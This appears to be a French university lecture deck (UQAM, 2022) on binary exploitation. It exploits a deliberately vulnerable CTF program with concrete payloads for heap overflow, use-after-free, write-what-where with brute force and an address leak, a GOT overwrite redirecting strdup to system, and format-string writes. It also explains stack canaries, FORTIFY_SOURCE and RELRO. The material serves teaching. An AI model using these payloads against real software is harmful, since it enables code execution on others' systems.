	Notes
Exploitation binaire contemporaine	
INF600C	
Sécurité des logiciels et exploitation de vulnérabilités	
Hiver 2022	
Université du Québec à Montréal	
1	
	Notes
Little birds	
Foncer dans le tas The Wall	
The Free Folks	
Hic sunt dracones	
Game of Thrones	
R'hllor	
Extra: format de chaîne	
Extra formation chame	
2	
	Notes
Little birds	

memo.c — niveau plume

```
49 int main(int argc, char **argv) {
50
    char cmd[32];
51
     setbuf(stdout, NULL);
     setregid(getegid(), getegid());
53
     printf("Le nord se souvient...\n");
54
     for(;;) {
55
       printf("Quels sont vos ordres?\n");
       char *res = fgets(cmd, 1024, stdin);
56
      if (!res) break;
57
58
      if(!strncmp(cmd, "login", 5)) c_login(cmd+6);
659 else if(!strncmp(cmd, "secret", 6)) c_secret();
   else if(!strncmp(cmd, "logout", 6)) c_logout();
else if(!strncmp(cmd, "memo", 4)) c_memo(cmd+5);
60
61
     else if(!strncmp(cmd, "debug", 5)) c_debug();
62
     else if(!strncmp(cmd, "pin", 3)) c_pin(cmd+3);
63
     else if(!strncmp(cmd, "id", 2)) system("id");
     else if(!strncmp(cmd, "quit", 4)) break;
65
       else printf("Commande inconnue.\n");
66
67
68
     return 0;
69 }
```

memo.c — niveau plume

```
$ ./memo
Commande: help
Commande inconnue.
Commande: quit
$
Objectif: pwn
$ python -c 'print "A"*200' | ./memo
*** stack smashing detected ***: <unknown> terminated
Abandon
```

Stack smashing detected?



Notes			

Notes			

Notes

\$ gdb memo > checksec CANARY : ENABLED FORTIFY : disabled NX : ENABLED PIE : ENABLED RELRO : disabled

6

Canari de pile (stack canary)

· Contre-mesure du compilateur 📽

memo a un mécanisme de sécurité en plus: canary

- · Pour protéger l'adresse de retour des fonctions
- · Autre noms: stack cookie, stack guard, stack protector

Principe

- · Au début de la fonction: empiler une valeur connue
- · Avant de faire le ret: vérifier la valeur dans la pile
- · Si la valeur dans la pile a changée
- · On déduit que la pile a été corrompue
- Et que l'adresse de retour n'est **plus fiable**
- Donc on avorte l'exécution ightarrow mieux vaut DOS que pwn

Utilisation

- gcc -fstack-protector et gcc -fstack-protector-strong
- Bonus: réordonne les variables locales et les paramètres sur la pile après les tableaux

7

Petits oiseaux



« It is one thing to deceive a king, and quite another to hide from the cricket in the rushes and the little bird in the chimney »

— Varys, A Clash of Kings (1998)

Ν	10.	tes

Notes

-	

Notes

Types de canaris

Terminateur

- · Valeur fixe
- · Avec les octets 00, 0A '\n', 0D '\r', FF
- ightarrow Pénible à restaurer mais pas nécessairement impossible

Aléatoire

- · Valeur aléatoire
- · Déterminée au démarrage du programme (__libc_start_main)
- Stockée quelque part en mémoire Facile et rapide d'accès par le CPU Pénible d'accès par l'attaquant
- · Possiblement XOR avec l'adresse de retour
- → L'attaquant fait préalablement fuiter la valeur du canari
- ightarrow Ou profite de faiblesses dans le PRNG (force brute)

9

Canaris en binaire

\$ gdb memo

> disassemble main

...// empilement du canari (à partir de fs:0x28)

0x55555555543b <+10>: mov rax,QWORD PTR fs:0x28

0x5555555555444 <+19>: mov QWORD PTR [rsp+0x28],rax

...// vérification du canari

0x555555555566 <+461>: mov rdx,QWORD PTR [rsp+0x28]

0x5555555555603 <+466>: xor rdx,QWORD PTR fs:0x28

0x555555555560 <+475>: jne 0x55555555619 <main+488>

...// retour normal... ou échec

0x5555555555618 <+487>: ret

0x55555555555619 <+488>: call 0x55555555070 <__stack_chk_fail@plt>

10

Inconvénients des canaris

- · Coûteux (surtout ceux aléatoires)
- · Ne protège que retaddr
- · Des stratégies de contournement existent
 - → Lire et réécrire le canari
 - → Écrire directement sur *retaddr* en évitant de toucher au canari
 - \rightarrow Viser autre chose que retaddr

Votes			
Notes			
Notes			

Foncer dans le tas

```
Notes ______
```

memo.c — battre le niveau plume

```
7 struct user {
8 char name[10];
9
    int lord;
10
     long *pin;
11 } *user;
12 long pin = 1234;
13 void c_login(char *data) {
14  user = malloc(sizeof(struct user));
     user->lor<mark>d = 0;</mark> user->pin = &pin;
15
16
     strcpy(user->name, data);
17 }
18 void c_secret(void) {
19  if (user == NULL) printf("Pas authentifié\n");
20 else if (user->lord == 10) cat("flag1.txt");
     else printf("Pas autorisé: %s\n", user->name);
21
22 }
                                                                      12
```

Notes			

Tas (heap)

Le tas est une zone mémoire pour l'allocation dynamique (dynamique == à la demande)

- · malloc, calloc, new. alloue de la mémoire dans la zone
- · free, delete, le ramasse-miettes: libère la mémoire allouée
- La mémoire libérée est réutilisée par la suite C'est le grand cycle de la vie

La gestion du tas est laissée au programme (algorithmes et structures de données)

- · libc (C)
- · compilateur + bibliothèque de support (C++)
- · machine virtuelle/interpréteur + ramasse-miettes (Java, Python)

Notes		

Tas et Pile Notes Ressemblances · C'est de la mémoire (agnostique!) · Stocke de la donnée utilisateur · Non exécutable (NX) · Mémoire allouée/libérée de façon relativement déterministe ightarrow On peut prévoir comment et quand les octets sont utilisés Différences dans le Tas · Des trous (zones libérées) · Pas de registre %sp · Des métadonnées (pour gérer le tas) · Pas de canaris dans le tas · Pas d'adresse de retour de fonction dans le tas · La plupart des données intéressantes sont dans le tas · Structures fixes et prédictibles (ABI) Débordement de tas (heap overflow) Notes Comme un débordement de pile · L'attaquant écrit en dehors des bornes d'une donnée · Donc déborde sur les données voisines en mémoire: → les champs voisins dans le struct CWE-122 Heap-based Buffer Overflow memo: mise en œuvre du débordement dans le tas Notes · L'attaquant peut déborder le champ user->nom • Et écraser user->admin avec une valeur arbitraire · 10, ce qui est demandé, soit 0x0a000000 Payload • "A" * 10 pour remplir user->nom • "вв" à cause du padding l'ABI impose d'aligner *user->admin* sur des multiples de 4 octets • "\n" car il a pour code ASCII 10

· 0x0a**00**0000 est mis par *strcpy*, c'est le '\0' terminal de chaîne

La valeur de user->admin

• 0x**0a**000000 le '\n' du payload

Ya pas que retaddr dans la vie Notes Attaque du tas · Les protections dans la pile ne s'appliquent pas au tas · La structure est fixe et prédictible (ABI) · Débordement de tampon pour corrompre des données · Des données du tas sont intéressantes à attaquer En particulier des pointeurs de fonction Et des données métiers sensibles Contrôle d'%ip • retaddr est la meilleure cible mais n'est pas toujours accessible · Tout autre pointeur de fonction est une cible intéressante • Enfin, l'attaquant n'est pas obligé de contrôler %ip pour arriver à ses Attaque de métadonnées du tas Notes · Métadonnées: structures de données utilisées pour gérer le tas · Attaques très techniques et spécifiques aux implémentations Principe · On profite d'un débordement de tas • pour **corrompre** les métadonnées utilisés par l'allocateur de tas · et contrôler le comportement de malloc, free, etc. qui sont des fonctions C classiques ightarrow C'est difficile et spécifique Notes The Wall

memo — niveau fort Nouvel adversaire: memo_fort \$ cat payload_plume | ./memo_fort *** buffer overflow detected ***: ./memo_fort terminated \$ gdb memo_fort > checksec CANARY : ENABLED FORTIFY : ENABLED NX : ENABLED PIE: ENABLED *RELRO* : disabled memo_fort a un mécanisme de sécurité en plus: fortify

Renforcement de source (fortify source)

- · Contre-mesure de la libc 🗐 (grâce à gcc 🖏
- · Pour protéger de certains dépassements de tampons

Principe

- Remplace les fonctions C dangereuses fgets, strcpy, printf, etc.
- Par des variations qui font des vérifications additionnelles
 _fgets_ckh, __strcpy_chk, __printf_chk, etc.
- Injecte des arguments additionnels déterminés statiquement char *strcpy(char *d, const char *s); devient char *_strcpy_chk(char *d, const char * s, size_t dlen);
- \cdot Avorte en cas d'échec ightarrow mieux vaut DOS que pwn

Notes

Notes

Utilisation du renforcement de source

Pour le développeur

- Positionner _FORTIFY_SOURCE (avec -o)
- Activer l'optimisation de code (avec -D)
- ightarrow gcc -02 -D_FORTIFY_SOURCE
- ightarrow ou gcc -02 -D_FORTIFY_SOURCE=2 pour être plus strict
- · Ça commence à être activé par défaut
- → gcc -U_FORTIFY_SOURCE pour désactiver

Bonus

- · gcc donne des avertissements supplémentaires
- · Protège aussi de certaines attaques de printf

Notes		

Fortification



« The Wall is where we stop them.The Wall was made to stop them »— Jon Snow, A Dance with Dragons (2011)

22

Notes

Renforcement de source en binaire

\$ gdb memo_fort > disassemble c_login 0x5555555552eb <+35>: mov QWORD PTR [rax+0x10],rcx 0x5555555552ef <+39>: mov edx,0xa 0x5555555552f4 <+44>: mov rsi,rbx 0x5555555552f7 <+47>: mov rdi,rax 0x5555555552fa <+50>: call 0x555555556f0 <__strcpy_chk@plt>

- · Il y a un 3ème argument à __strcpy_chk: c'est edx
- Il vaut 10 (0xa), soit la taille du champ *nom*

23

Que fait la libc?

- · Macro spéciale _FORTIFY_SOURCE (voir /usr/include/features.h)
- · Active du prétraitement (preprocessing) dans les .h standards
- · Définit les fonctions standards via des directives gcc spéciales
- $\rightarrow \ / usr/include/x86_64\text{-}linux\text{-}gnu/bits/string_fortified.h}$

En pratique?

- · Chaque fonction à protéger
- est **définie** dans le .h par une fonction inlininable
- qui fait un appel à la version _chk

 avec des arguments magiques supplémentaires attribute ((always_inline))
<pre>char *strcpy(char *dest, const char *src) {</pre>
<pre>returnstrcpy_chk(dest, src,</pre>
<pre>builtin_object_size(dest));</pre>
1

Notes		

Notes

Limites du renforcement de source

Faux positifs: DOS potentiels

- · Un dépassement de tampon sans effet
- · Devient un dénis de service

Nécessite un support du compilateur

- · La *libc* utilise des primitives de *gcc* dédiées
- · Pas forcément portables

Protection partielle

- · Les arguments supplémentaires sont déterminés statiquement
- En fonction du niveau d'analyse du compilateur (-o)
- · Et des heuristiques mises en œuvre
- ightarrow Tous les appels risqués ne sont pas nécessairement remplacés
- → Le programmeur n'a ni contrôle ni retour d'information

25

т	hΛ	Erz	20	E_{A}	lks
- 11		ги		$\Gamma()$	IK S

memo.c — battre le niveau fort

```
24 void c_logout(void) {
25
   free(user);
26 }
27 char *memo = "Pas de mémo\n";
28 void c_memo(char *data) {
29
   if (strlen(data)>0) memo = strdup(data);
    printf(memo);
31 }
32 void c_debug(void) {
   printf("memo %p %s", memo, memo);
33
34
     if (!user) return;
     printf("user %p %d %p %s", user,
35
36
         user->lord, user->pin, user->name);
37 }
```

Notes		
Notes		
Notes		

Utilisation après libération (use after free, UAF)

Pendouiller: verbe intransitif
 Pendre mollement et d'une manière ridicule

Pointeur qui pendouille (dangling pointer)

- · Un pointeur libéré est toujours un pointeur
- $\cdot\,$ Utiliser un pointeur libéré est un comportement indéterminé
 - ightarrow c'est ça le bug du programmeur
- · En pratique, la zone pointée sera réutilisée
- · Et sera référencée par un pointeur légitime

Principe de l'attaque

- · Deux pointeurs, un UAF et un légitime, partagent de la mémoire
- \cdot Les types, rôles, code client sont possiblement très différents
- · L'attaquant lit/écrit l'un à travers l'autre
- · CWE-416 Use After Free

2

Notes

Use After Free Folks



These are wildlings: savages, raiders, rapers, more beast than man »
 Bowen Marsh, A Dance with Dragons (2011)

20

Notes			

memo_fort: mise on œuvre du UAF

- · Après le free, user est encore utilisable
- · strdup utilise malloc en interne

Payload

- · "login\nlogout\n" alloue et libère user
- · "memo AAAAAAAAABB\n" écrit par dessus user
- "secret\n" utilise le pointeur invalide user, ce qui permet d'avoir le flag

Notes			

UAF dans la vraie vie Notes Vulnérabilité à la mode · Pas de contre-mesure systématique · Bugs complexes à déceler Analyse statique complexe, bugs très circonstanciels · Aucune corruption mémoire n'est nécessaire · Utilisable aussi pour faire fuiter de l'information Secrets, pointeurs ASLR, etc. Exemples • CVE-2016-5213 Use after free in V8 in Google Chrome • CVE-2016-5771 Use after free in PHP's GC and unserialize UAF: contre-mesures Notes Contre-mesures du programmeur · Mettre les pointeurs à NULL après un free Pas efficace si des pointeurs inaccessibles existent · Utiliser un langage avec gestion automatique de la mémoire Pas toujours faisable Notes Hic sunt dracones

memo_fort — niveau 2

```
47 long kingmode = 0;

48 void c_pin(char *data) {

49 if(user && user->pin) {

50 long i = atol(data);

51 if (i) *user->pin = i;

52 printf("PIN: %ld\n", *user->pin);

53 }

54 if (kingmode == 42) cat("flag2.txt");

55 }
```

Objectif: avoir le flag2

32

Notes

Write-what-where

- · Un bug qui permet à un attaquant
- · D'écrire en mémoire une valeur arbitraire
- · À un emplacement arbitraire
- · CWE-123: Write-what-where Condition

Très puissant

- · Contourne les protections
- · Attaque chirurgicale

Difficultés d'exploitation

- · ASLR (et PIE)
- ightarrow Faire fuiter des adresses: payload dynamique

33

Dragons



« Dragons are fire made flesh, and fire is power »

— Quaithe, A Clash of Kings (1998)

Notes			

Notes			

memo_fort: write-what-where par la force

• Trouver l'adresse relative de *kingmode* merci *nm*

0000000000003640 B kingmode

Ne conserver que les 12 derniers bits (décalage dans la page)
 0x000000000000003640

Payload

- · "login\nlogout\n" alloue et libère user
- · "memo AAAAAAAAAABBCCCC" écrit par dessus user
- "\x40\x06" où 0x640 est le décalage de kingmode
- " \times 00n" où \times 00 abrège le strcpy et \times 1 termine la commande
- · "pin 42\n" écrit 42, là où pointe maintenant user->pin

35

Notes

memo_fort — mise en œuvre de la force brute

Après l'écrasement de user, user->pin vaut 0x????????000640

- 0x????????000640 est toujours bon (écrasement partiel)
- 0x????????000640 est toujours bon (décalage dans la page)
- 0x?????????000640 est aléatoirement bon

Entropie: 12 bits, une chance sur 2^{12} , soit 0,024% de chance

En local

- Sur ma machine: 3000 essais par seconde
- · Après une seconde: 52% de chance
- · Après 10 secondes: 99.9% de chance
- $\,\,
 ightarrow\,$ C'est très efficace !!!

36

Bruteforce



« Enough with the clever plans »

— Daenerys Targaryen, The Spoils of War (2017)

Notes			
Notes			

La force en distant Notes · 50 essais par seconde · Après une seconde: 1.2% de chance · Après une minute: 52% de chance · Après 10 minutes: 99.9% de chance $\rightarrow \text{ C'est efficace !}$ Rate-limit agressif · 1 essai par seconde · Après une minute: 1.5% de chance · Après une heure: 58% de chance · Après 4 heures: 97% de chance Plus d'entropie Notes 1 octet de plus: 12 ightarrow 20 bits · 1 essai par seconde · Après une journée: 8% de chance · Après une semaine: 44% de chance · Après un mois: 92% de chance ightarrow Pas pour les CTF 2 octets de plus: 12 ightarrow 28 bits • 1 essai par seconde · Après un mois: 1% de chance · Après un an: 11% de chance · Après 15 ans: 83% de chance ightarrow Ce n'est pas très efficace. memo_fort — fuite d'information Notes · Trouver l'adresse réelle de pin merci commande debug user 0x56295319f670 0 0x5629517ac610 toto · Trouver le décalage avec kingmode merci nm(1) 0000000000003610 D pin 0000000000003640 B kingmode · Calculer l'adresse réelle de kingmode 0x5629517ac6**40** Payload dynamique · "login\nlogout\n" alloue et libère user · "memo AAAAAAAAAABBCCCC" écrit par dessus user

· "\x40\xc6\x7a\x51\x29\x56\x00\n" adresse calculée de kingmode

· "pin 42\n" écrit 42, là où pointe maintenant user->pin

Fuite d'information



« Secrets are worth more than silver or sapphires » — Varys, A Dance with Dragons (2011)

41

Notes

Notes		

Game of Thrones

·	 ·	

memo_fort — niveau 3

Objectif: pwn

Écraser un retaddr de la pile ?

· On ne sait pas où est la pile

Écraser un pointeur de fonction ?

· Il en a pas dans le code C

Et puis comment passer les arguments?

Notes			

Besoin de liens dynamiques Notes Le code machine des programmes · Est indépendant de la position initiale de changement (PIC) Par exemple via des accès relatif à %ip · Est chargé tel quel en mémoire • Est en lecture seule · Est partagé entre les processus Or, il accède à des choses externes · Variable globales et fonctions de bibliothèques · Ces bibliothèques sont chargées dynamiquement · À des endroits aléatoire (ASLR) ightarrow Comment il connaît l'adresse des choses externes? Théorème fondamental de l'ingénierie logicielle Notes « Tout problèmes en informatique peut être résolu par un nouveau niveau d'indirection » — David Wheeler GOT: Global Offset Table Notes Table d'indirection qui contiendra les adresses absolue (des pointeurs) · vers données globales · vers des fonctions Pour l'éditeur de lien statique (1d) 🐾 · Chaque bibliothèque et exécutable a sa propre GOT · Une entrée par fonction ou variable importée (et utilisée) · Les positions relatives des entrées sont statiquement déterminées · La GOT est rangée dans un segment de donnée rw-Le chargeur et éditeur de lien dynamique (1d.so) % · Analyse les besoins de l'exécutable et des bibliothèques · Détermine les adresses réelles des fonctions et variables · Remplit les entrées des GOT (relocation dynamique)

· Chaque processus a sa propre version des GOT

Global Offset Table



When you play the global offset table, you win or you die.
 There is no middle ground. »
 Cersei Lannister (approximatif), A Game of Thrones (1996)

46

Notes

Notes

PLT: Procedure Linkage Table

Fonctions d'indirection pour appeler les sous-programmes

- · Courtes fonctions
- · Qui branchent (redirigent %ip) vers la bonne fonction
- · L'adresse de la bonne fonction est dans la GOT

Pour l'éditeur de lien (1d)

- · Chaque bibliothèque et exécutable a sa propre PLT
- · Une entrée par fonction
- · Les positions relatives des entrées sont statiquement déterminée
- \cdot La PLT est rangée dans un segment de code r-x (partageable)

Pour le chargeur et éditeur de lien dynamique (ld.so)

- $\boldsymbol{\cdot}\:$ Ne touche pas à la PLT
- $\cdot\,$ Se contente de résoudre les symboles dans la GOT

47

Notes			
-			
-			

Idx Nom	Taille	Adresse	Mémoire	Décalage	Droits
11 .plt	00000120	0000000	900001020	00001020	(r-x)
21 .got	00000028	0000000	900003538	00002538	(rw-)
22 .got.plt	000000a0	0000000	900003560	00002560	(rw-)
24 .bss	00000030	0000000	900003620	00002620	(rw-)
\$ objdump -d	-Mintel	memo_fo	rt		
000000000000)1030 <fr< td=""><td>ee@plt>:</td><td></td><td></td><td></td></fr<>	ee@plt>:			
1030: ff2542	250000 ji	np Q[rip	+0x2542]#3	3578 <free< td=""><td>OGLIBC_2.2.5></td></free<>	OGLIBC_2.2.5>
1036:6800000	0000 р	ush 0x0			
103b:e9e0fff	fff jı	np 1020	<.plt>		
000000000000)134e <c_< td=""><td>logout>:</td><td></td><td></td><td></td></c_<>	logout>:			
134e:4883ec0	08	sub rsp	,0x8		
1352:488b3de	f220000 i	nov rdi	,Q[rip+0x2	22ef]#3648	3 <user></user>
1359:e8d2fcf	fff	call 103	9 <free@p< td=""><td>lt></td><td></td></free@p<>	lt>	
135e:4883c40)8 i	add rsp	,0x8		
1362:c3	1	ret			
\$ objdump -R	memo_for	rt			
000000000000	3578 R_X	36_64_JUI	MP_SLOT :	free@GLIB	2_2.2.5
	_	_			_

Résolution dynamique paresseuse Notes · Les variables globales (GOT) sont résolues au chargement · Les fonctions (GOTPLT) sont résolues paresseusement Une entrée dans la GOTPLT contient · Si résolue: l'adresse réelle de la fonction · Sinon: l'adresse d'un morceau de code de résolution En x86_64: le morceau de code de résolution · Est spécifique à chaque fonction Il est normalement stockée juste après l'entrée PLT · Appelle la fonction de résolution locale Normalement dans l'entrée 0 de PLT · Qui appelle la fonction de résolution générale de ld.so Normalement dans l'entrée 2 de GOT · Qui charge la bibliothèque, résout le symbole, met à jour la GOT et exécute la fonction normalement Attaque de la GOT Notes GOT: cible intéressante pleine de pointeurs · Position relative constante (voire absolue si pas PIE) · Pointe d'autres zones mémoire (fuite ASLR/PIE) · Pointe des fonctions utilisées (contrôle %ip) · Pointe des fonctions utiles (read, write, system) · Permet d'invoquer ld.so (attaques plus sophistiquées) Et PLT? · Adresses alternatives pour des fonctions de bibliothèques memo_fort: mise en œuvre du niveau 3 Notes · Faire un write-what-where (via user->pin) · Remplacer une fonction dans la GOT par system

ightarrow strdup par exemple

Quelle fonction remplacer?

· Dont on contrôle l'argument

Même signature binaire que int system(char*)

· Dont on contrôle le moment d'exécution

memo_fort: mise en œuvre du niveau 3

- Trouver l'adresse relative de strdup dans la GOT merci objdump -R
 0000000000000035f8 R_X86_64_JUMP_SLOT strdup@GLIBC_2.2.5
- Trouver une adresse relative de system merci objdump -d memo_fort | grep system 00000000000001080 <system@plt>:

 $\textbf{1080:} \ \textit{ff251a250000} \ \textit{jmp} \ \textit{Q[rip+0x251a]\#35a0} \ \textit{<system@GLIBC_2.2.5>}$

1672: e854faffff call 1080 <system@plt>

Payload dynamique

- Faire pointer user->pin sur strdup dans la GOT
- Écrire l'adresse de system à la place de celle de strdup pin 94647988867200
- Exécuter des commandes shell

52

Notes

R'hllor

memo_relro

Nouvel adversaire: $\textit{memo_relro}$

\$./memo_relro < memo_fort_niveau1.txt</pre>

FLAG1!

\$./memo_fort.py ./memo_relro

flag: FLAG2!

\$./memo_fort.py ./memo_relro SHELL

Process './memo_relro' stopped with exit code -11 (SIGSEGV)

\$ gdb memo_relro

> checksec

CANARY : ENABLED
FORTIFY : ENABLED
NX : ENABLED
PIE : ENABLED
RELRO : FULL

	_
	_
	_
	-
	_
	_
	_
	_
Notes	
	_
	_
	_
	_
	_
	_
	_
	_
Notes	
	_
	_
	_
	_
	_
	_
	_
	_

RELRO: Relocation Read Only

- · Contre-mesure de l'éditeur de lien dynamique %
- · Qui protège la GOT contre les écritures

Mode partiel: résolutions toujours paresseuses

- · GOT en lecture-seule
- · GOTPLT en lecture écriture
- · Option -z relro de ld (et gcc)

Mode total: résolutions au chargement

- · GOT et GOTPLT en lecture-seule
- · Options -z relro -z now de ld (et gcc)

54

R'hllor



« Light our fire and protect us from the dark, blah, blah. »
— Tyrion Lannister, A Dance with Dragons (2011)

55

\$ gdb memo_fort > vmmap 0x0000555555557000 0x000055555558000 rw-p memo_fort 0x0000555555555560 - 0x000055555557600 is .got.plt \$ gdb memo_relrop > vmmap 0x000055555557000 0x000055555558000 r--p memo_relrop 0x0000555555558000 0x000055555559000 rw-p memo_relrop > info files 0x0000555555557fd8 - 0x0000555555558000 is .got 0x0000555555558000 - 0x0000555555580a0 is .got.plt \$ gdb memo_relro > vmmap 0×000055555557000 $0 \times 0000555555558000$ r--p memo_relro > info files 0x0000555555557f38 - 0x0000555555558000 is .got 0x0000555555558000 - 0x000055555558020 is .data (pas de section .got.plt dédiée en -z now)

Notes			
Notes			
Notes			
Notes			

Vaincre quand même? Notes memo_relro est bien protégé: · Injection de code: NX (processeur 🖨) • Aléatoire: ASLR (système 🐧) & PIE (compilateur 🗱) • Débordement: canari (compilateur 🗱) & fortify (libc 🗐) · Corruption de GOT: relro (éditeur de liens dynamique %) Les meilleures contre-mesures modernes sont en place Mais il reste des bugs du programmeur exploitables · use after free · write-what-where · fuite d'information Conclusion exploitation binaire Notes Vulnérabilités de sécurité exploitables · Avant tout des bugs • Donc **programmeur** = responsable Contre-mesures binaires modernes · Limiter l'exploitabilité · Difficile à exploiter ightarrow peu vont essayer ightarrow moins vont réussir Coût des contre-mesures · Complexité des systèmes · Limitation de l'expressivité L'exploitation binaire de base · Difficile de nos jours · Où est le fun? Conclusion générale Notes En tant que programmeur · Vous programmez plus sûr · Vous ne faites pas confiance à l'utilisateur En tant qu'expert en sécurité

- · Vous savez identifier les vulnérabilités et les vecteurs d'attaque
- · Vous comprenez les alertes de sécurités
- · Vous connaissez les contre-mesures

En tant qu'informaticien

- · Vous connaissez mieux l'informatique
- · Et de nombreux détails techniques et théoriques

En tant que joueur

- · Faites des CTF
- → top 100 ringzer0
 - · Tentez des bounty

•	

Extra: format de chaîne

Notes		

Format de chaîne

- · Le format (premier argument de printf(3)) est très expressif
- · Un attaquant qui contrôle un format a beaucoup de pouvoir
- CWE-134: Use of Externally-Controlled Format String

Exemple classique de bug:

- · printf(str); au lieu de
- printf("%s", str);
- où str est contrôlable par l'utilisateur

Notes

Format de chaîne



« Have you ever thought that you might wear a maester's chain? »

— Maester Luwin, A Game of Thrones (1996)

-	

Notes			

Fonction variadique (varargs)

int printf(const char *format, ...);

- printf accepte une nombre arbitraire d'arguments
- · l'ABI spécifie comment sont passés ces arguments
- \cdot C'est au programmeur de fournir les bons arguments à utiliser
- ightarrow De mauvais arguments cause un comportement indéterminé

En pratique

- · les arguments sont dans la pile
- · le contenu de la pile sera interprété par printf
- \cdot le format contrôle l'interprétation
- ightarrow et les accès dans la pile

62

Types d'attaques par format string

- printf("%p %p %p") fuite d'information de la pile
- printf("%100\$p") fuite d'information au fond de la pile
- printf("abcd%42\$n") écrit 4 via un pointeur dans la pile
- · printf("%200c%42\$n") écrit 200 via un pointeur dans la pile

Stratégie

- $\boldsymbol{\cdot}\,$ Trouver un pointeur dans la pile qui pointe où on veut
 - ightarrow Y écrire ce qu'on veut
- · Trouver un pointeur dans la pile qui pointe dans la pile
 - ightarrow Écrire le *where* via le pointeur
 - ightarrow Écrire le *what* via le pointé

Contre-mesures

- $\cdot\,$ Ne jamais donner le contrôle du format à l'utilisateur
- · -D_FORTIFY_SOURCE=2 protège certains %n et %42\$

c2

Notes		
votes		
Notes		
votes		